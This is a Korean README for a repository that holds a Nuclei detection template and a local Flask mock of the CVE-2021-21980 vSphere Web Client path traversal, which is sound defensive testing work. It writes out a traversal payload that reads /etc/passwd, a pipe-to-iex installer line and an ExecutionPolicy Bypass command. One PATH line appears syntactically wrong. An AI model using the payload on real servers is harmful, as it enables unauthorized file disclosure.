
CVE-2021-21980
이 저장소는 CVE-2021-21980(vSphere Web Client 경로 순회)을 탐지하는 높은 신뢰도의 Nuclei 템플릿과 안전한 로컬 테스트를 위해 취약한 동작을 재현하는 작은 모의 환경을 포함합니다.
파일:
cve-2021-21980.yaml: 여러 인코딩 변형과 매처가 포함된 Nuclei 템플릿app.py: /eam/vib 경로 순회 취약점을 시뮬레이션하는 작은 Flask 앱Dockerfile: 자체 서명 TLS 인증서를 사용하는 모의 서버용 컨테이너 이미지docker-compose.yml: 호스트 8443에서 수신 대기하는 모의 서버 실행requirements.txt: Python 종속성cd C:\Users\gui\Documents\hi
docker-compose up --build -d
모의 서버는 https://localhost:8443(자체 서명 TLS 인증서)에서 수신 대기합니다.
curl -k "https://localhost:8443/" # VMware vSphere Web Client (모의) 반환
curl -k "https://localhost:8443/eam/vib?id=../../../../../../../../../../etc/passwd"
모의 /app/sensitive/passwd-mock 파일의 내용을 받아야 합니다.
nuclei -t cve-2021-21980.yaml -u https://localhost:8443 -insecure
많은 인코딩 변형을 테스트하려면 Nuclei 템플릿을 높은 상세도로 실행하세요.
run_local_test.ps1을 실행하면 빌드, 준비 완료 대기, curl 검사 및 Nuclei(사용 가능한 경우)를 실행합니다.
powershell -ExecutionPolicy Bypass -File .\run_local_test.ps1
Windows에 Nuclei 설치 (빠른 방법):
iwr -useb get.scoop.sh | iex
scoop install coreutils
scoop install nuclei
Invoke-WebRequest -Uri https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_windows_amd64.zip -OutFile nuclei.zip
Expand-Archive -Path nuclei.zip -DestinationPath .\nuclei
Add-Content -Path $PROFILE -Value 'set PATH=$Env:PATH;$(Resolve-Path .\nuclei)'
nuclei가 PATH에 없으면 run_local_test.ps1은 curl 테스트까지만 실행됩니다.
Docker 이미지를 빌드하는 데 문제가 있으면 Docker Desktop이 설치되어 있고 'WSL 2 기반 엔진 사용'이 활성화되어 있는지 확인하세요.
서버가 취약한 경우 /etc/passwd 또는 유사한 파일이 반환됩니다.
보안: 시스템을 스캔하거나 악용하기 전에 항상 명시적 승인을 받으십시오.